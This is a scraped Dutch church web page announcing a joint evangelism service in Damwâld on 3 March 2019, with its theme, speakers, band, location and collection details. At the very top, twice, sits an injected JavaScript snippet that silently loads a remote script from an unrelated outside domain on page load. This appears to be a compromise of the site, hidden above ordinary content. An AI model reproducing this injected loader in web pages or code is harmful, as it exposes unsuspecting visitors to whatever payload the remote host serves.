;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 3 maart 2019 9:30 uur - PKN Damwâld
zondag 3 maart 2019
09:30 uur
m.m.v. Klaailûd

Kerkdienst zondag 3 maart 2019 9:30 uur

Thema: Gezamenlijke evangelisatie toerustingsdienst

“Ik ga op reis en neem mee…”

Op zondag 3 maart organiseert de gezamenlijke evangelisatiecommissie een toerustingsdienst met het thema “Ik ga op reis en neem mee…” De aanleiding voor dit thema is de reis van verschillende jongeren in de komende zomer met World Servants. Als je zo’n reis doet, neem je verschillende dingen mee terug naar huis. Het kan je geloof versterken. Tijdens de dienst zullen een aantal leiders van de groep hun verhaal met ons delen. Zij vertellen onder andere over hele bijzondere momenten tijdens hun reizen maar ook hun geloofsgetuigenis en hoe World Servants deze veranderd heeft.

Ds. Otter zal de dienst voorgaan en ons bemoedigen. De muziek wordt verzorgd door gospelband Klaailûd. De dienst is een gezamenlijke dienst en zal plaatsvinden in de Ontmoeting en begint om 9:30 uur. De collecte tijdens de dienst is voor de jongeren die dit jaar op pad gaan met World Servants.

Het belooft een hele bijzondere dienst te worden met hele bijzondere verhalen, kortom een dienst die u niet wilt missen!

Informatie

Voorganger:Ds. G.J. Otter
Thema:Gezamenlijke evangelisatie toerustingsdienst
Mededeling:m.m.v. Klaailûd
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconaal doel
Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris